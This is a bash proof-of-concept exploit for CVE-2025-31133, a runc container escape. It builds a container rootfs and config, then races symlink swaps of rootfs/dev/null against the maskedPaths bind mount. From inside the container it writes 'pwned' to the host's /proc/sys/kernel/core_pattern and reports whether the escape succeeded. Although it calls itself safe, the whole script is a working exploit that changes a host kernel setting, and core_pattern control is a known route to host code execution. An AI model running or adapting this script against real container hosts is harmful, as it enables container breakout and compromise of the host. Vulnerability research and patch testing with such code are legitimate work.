#!/bin/bash
# CVE-2025-31133 runc maskedPaths symlink race exploit
# This PoC demonstrates the vulnerability by modifying core_pattern to "pwned"
# This is a safe PoC that does NOT execute code, only proves the vulnerability exists.

set -euo pipefail

RUNC_BIN="$(which runc)"
CONTAINER_ROOTFS="./rootfs"
CONTAINER_NAME="cve31133poc"
ORIGINAL_CORE_PATTERN="/tmp/cve31133_original_core_pattern.txt"
EXPLOIT_CORE_PATTERN="pwned"
RACE_PID=""

# Cleanup function
cleanup() {
  echo "[*] Cleaning up..."
  # Stop race process
  if [ -n "$RACE_PID" ] && kill -0 "$RACE_PID" 2>/dev/null; then
    kill "$RACE_PID" 2>/dev/null || true
  fi
  # Force cleanup container
  if $RUNC_BIN state "$CONTAINER_NAME" >/dev/null 2>&1; then
    $RUNC_BIN kill "$CONTAINER_NAME" KILL 2>/dev/null || true
    sleep 0.2
    $RUNC_BIN kill "$CONTAINER_NAME" 2>/dev/null || true
    sleep 0.2
    $RUNC_BIN delete "$CONTAINER_NAME" 2>/dev/null || true
    # Try force delete if still exists
    if $RUNC_BIN state "$CONTAINER_NAME" >/dev/null 2>&1; then
      $RUNC_BIN delete --force "$CONTAINER_NAME" 2>/dev/null || true
    fi
  fi
  # Clean up files
  rm -rf "$CONTAINER_ROOTFS" config.json 2>/dev/null || true
}

trap cleanup EXIT INT TERM

echo "[*] ========================================"
echo "[*] CVE-2025-31133 PoC - Container Escape"
echo "[*] ========================================"
echo "[*] runc version: $($RUNC_BIN --version | head -1)"
echo "[*] Make sure this is a known vulnerable runc version (CVE-2025-31133)."

# Clean up any existing containers and files
echo "[*] Cleaning up any existing containers and files..."
# Force cleanup of any existing container (handle all possible states)
if $RUNC_BIN state "$CONTAINER_NAME" >/dev/null 2>&1; then
  echo "[*] Found existing container, forcing cleanup..."
  # Try to kill if running
  $RUNC_BIN kill "$CONTAINER_NAME" KILL 2>/dev/null || true
  sleep 0.5
  # Try standard kill
  $RUNC_BIN kill "$CONTAINER_NAME" 2>/dev/null || true
  sleep 0.5
  # Delete the container
  $RUNC_BIN delete "$CONTAINER_NAME" 2>/dev/null || true
  sleep 0.5
  # Verify deletion
  if $RUNC_BIN state "$CONTAINER_NAME" >/dev/null 2>&1; then
    echo "[!] WARNING: Container still exists after cleanup attempt."
    echo "[!] Trying force delete..."
    $RUNC_BIN delete --force "$CONTAINER_NAME" 2>/dev/null || true
  fi
fi
# Clean up files
rm -rf "$CONTAINER_ROOTFS" config.json 2>/dev/null || true

# Save original core_pattern for comparison
echo "[*] Saving original core_pattern..."
cat /proc/sys/kernel/core_pattern > "$ORIGINAL_CORE_PATTERN" 2>/dev/null || echo "core" > "$ORIGINAL_CORE_PATTERN"
ORIGINAL_PATTERN=$(cat "$ORIGINAL_CORE_PATTERN")
echo "[*] Original core_pattern: $ORIGINAL_PATTERN"

# Fresh rootfs with static /dev
echo "[*] Creating fresh rootfs..."
mkdir -p "$CONTAINER_ROOTFS"/{proc,dev,sys,bin,tmp}
if [ -f "$(which busybox)" ]; then
  cp "$(which busybox)" "$CONTAINER_ROOTFS/bin/sh"
  chmod +x "$CONTAINER_ROOTFS/bin/sh"
else
  echo "[!] ERROR: busybox not found. Please install busybox-static."
  exit 1
fi
rm -f "$CONTAINER_ROOTFS/dev/null" 2>/dev/null || true
mknod "$CONTAINER_ROOTFS/dev/null" c 1 3

cat > config.json <<EOF
{
  "ociVersion": "1.0.2",
  "process": {
    "terminal": false,
    "user": { "uid": 0, "gid": 0 },
    "args": ["/bin/sh", "-c", "sleep 30"],
    "env": ["PATH=/bin"],
    "cwd": "/"
  },
  "root": { "path": "rootfs", "readonly": false },
  "mounts": [
    { "destination": "/proc", "type": "proc", "source": "proc" },
    { "destination": "/sys", "type": "sysfs", "source": "sysfs" }
  ],
  "linux": {
    "namespaces": [
      { "type": "pid" },
      { "type": "network" },
      { "type": "mount" },
      { "type": "ipc" },
      { "type": "uts" }
    ],
    "maskedPaths": [
      "/proc/kcore",
      "/proc/latency_stats",
      "/proc/timer_list",
      "/proc/sched_debug",
      "/sys/firmware",
      "/proc/sys/kernel/core_pattern"
    ]
  }
}
EOF
echo "[*] config.json created (explicit maskedPaths, /dev NOT bind-mounted to allow race on rootfs/dev/null)."

# Start the symlink race BEFORE and DURING runc run
# This exploits the race condition where runc doesn't verify /dev/null is actually a device node
# before using it for bind-mounting maskedPaths
# Strategy: Keep /dev/null as device node most of the time, but briefly replace it with symlink
# to increase chance of hitting the race during maskedPaths application
symlink_race() {
  local end=$((SECONDS+20))
  while [ $SECONDS -lt $end ]; do
    # Keep device node most of the time (allows runc init to succeed)
    # Only briefly replace with symlink to catch the maskedPaths application window
    rm -f "$CONTAINER_ROOTFS/dev/null"
    ln -s /proc/sys/kernel/core_pattern "$CONTAINER_ROOTFS/dev/null"
    # Very short window as symlink (to catch maskedPaths)
    usleep 500 2>/dev/null || sleep 0.0005
    rm -f "$CONTAINER_ROOTFS/dev/null"
    mknod "$CONTAINER_ROOTFS/dev/null" c 1 3
    # Longer window as device node (allows normal operation)
    usleep 5000 2>/dev/null || sleep 0.005
  done
}

# Ensure /dev/null exists before starting
rm -f "$CONTAINER_ROOTFS/dev/null" 2>/dev/null || true
mknod "$CONTAINER_ROOTFS/dev/null" c 1 3

echo "[*] Starting symlink race background process..."
symlink_race &
RACE_PID=$!

# Small delay to ensure race is running
sleep 0.1

# Final check before starting container
if $RUNC_BIN state "$CONTAINER_NAME" >/dev/null 2>&1; then
  echo "[!] ERROR: Container '$CONTAINER_NAME' still exists after cleanup!"
  echo "[!] Please manually delete it: sudo runc delete $CONTAINER_NAME"
  echo "[!] Or force delete: sudo runc delete --force $CONTAINER_NAME"
  exit 1
fi

# Start container while race is active
echo "[*] Launching runc run..."
if ! $RUNC_BIN run --detach --bundle . "$CONTAINER_NAME" 2>&1; then
  echo "[!] ERROR: Failed to start container."
  # Check if it's the "already exists" error
  if $RUNC_BIN state "$CONTAINER_NAME" >/dev/null 2>&1; then
    echo "[!] Container exists but may be in a bad state. Attempting cleanup..."
    $RUNC_BIN kill "$CONTAINER_NAME" KILL 2>/dev/null || true
    sleep 1
    $RUNC_BIN delete --force "$CONTAINER_NAME" 2>/dev/null || true
    echo "[!] Please run the script again after cleanup."
  fi
  exit 1
fi

# Wait for container to be ready
sleep 2

# Check if container is running
if ! $RUNC_BIN state "$CONTAINER_NAME" >/dev/null 2>&1; then
  echo "[!] ERROR: Container is not running."
  exit 1
fi

echo "[*] Container is running."
echo "[*] Attempting to write to /proc/sys/kernel/core_pattern in container..."
echo "[*] This exploits the race condition if /dev/null was replaced with symlink during maskedPaths."
echo "[*] Writing 'pwned' to prove the vulnerability (safe PoC, no code execution)."

# Try to write to core_pattern (safe PoC - just writes "pwned")
if $RUNC_BIN exec "$CONTAINER_NAME" /bin/sh -c "echo '$EXPLOIT_CORE_PATTERN' > /proc/sys/kernel/core_pattern 2>&1 && echo 'Write successful' || echo 'Write failed'" 2>&1; then
  echo "[*] Attempted to write 'pwned' to core_pattern."
else
  echo "[!] WARNING: Failed to write to core_pattern in container."
fi

# Wait for race to finish
wait $RACE_PID 2>/dev/null || true

# Clean up container
echo "[*] Stopping container..."
$RUNC_BIN kill "$CONTAINER_NAME" 2>/dev/null || true
$RUNC_BIN delete "$CONTAINER_NAME" 2>/dev/null || true

# Check if exploit succeeded
echo ""
echo "[*] ========================================"
echo "[*] Exploit Verification"
echo "[*] ========================================"
CURRENT_PATTERN=$(cat /proc/sys/kernel/core_pattern 2>/dev/null || echo "")
echo "[*] Original core_pattern: $ORIGINAL_PATTERN"
echo "[*] Current core_pattern:  $CURRENT_PATTERN"

if [ "$CURRENT_PATTERN" = "$EXPLOIT_CORE_PATTERN" ]; then
  echo ""
  echo "[+] ========================================"
  echo "[+] EXPLOIT SUCCEEDED!"
  echo "[+] ========================================"
  echo "[+] core_pattern has been modified to: $CURRENT_PATTERN"
  echo "[+] This means the race condition was successful and /dev/null was replaced"
  echo "[+] with a symlink during maskedPaths application."
  echo "[+] Container escape via CVE-2025-31133 is confirmed!"
  echo "[+] The vulnerability allows writing to host's /proc/sys/kernel/core_pattern"
  echo "[+] from inside a container, proving the container escape capability."
  echo ""
  echo "[!] NOTE: The host's core_pattern has been modified to 'pwned'."
  echo "[!] This is safe and does not execute code. You can restore it:"
  echo "[!]   echo '$ORIGINAL_PATTERN' | sudo tee /proc/sys/kernel/core_pattern"
  exit 0
elif [ "$CURRENT_PATTERN" != "$ORIGINAL_PATTERN" ]; then
  echo ""
  echo "[?] core_pattern was modified but not to expected value."
  echo "[?] This might indicate a partial success or different exploit path."
  exit 2
else
  echo ""
  echo "[-] Exploit did not succeed - core_pattern unchanged."
  echo "[-] The race condition may not have been hit, or the vulnerable version"
  echo "[-] check failed. Try running multiple times (race conditions are non-deterministic)."
  exit 1
fi
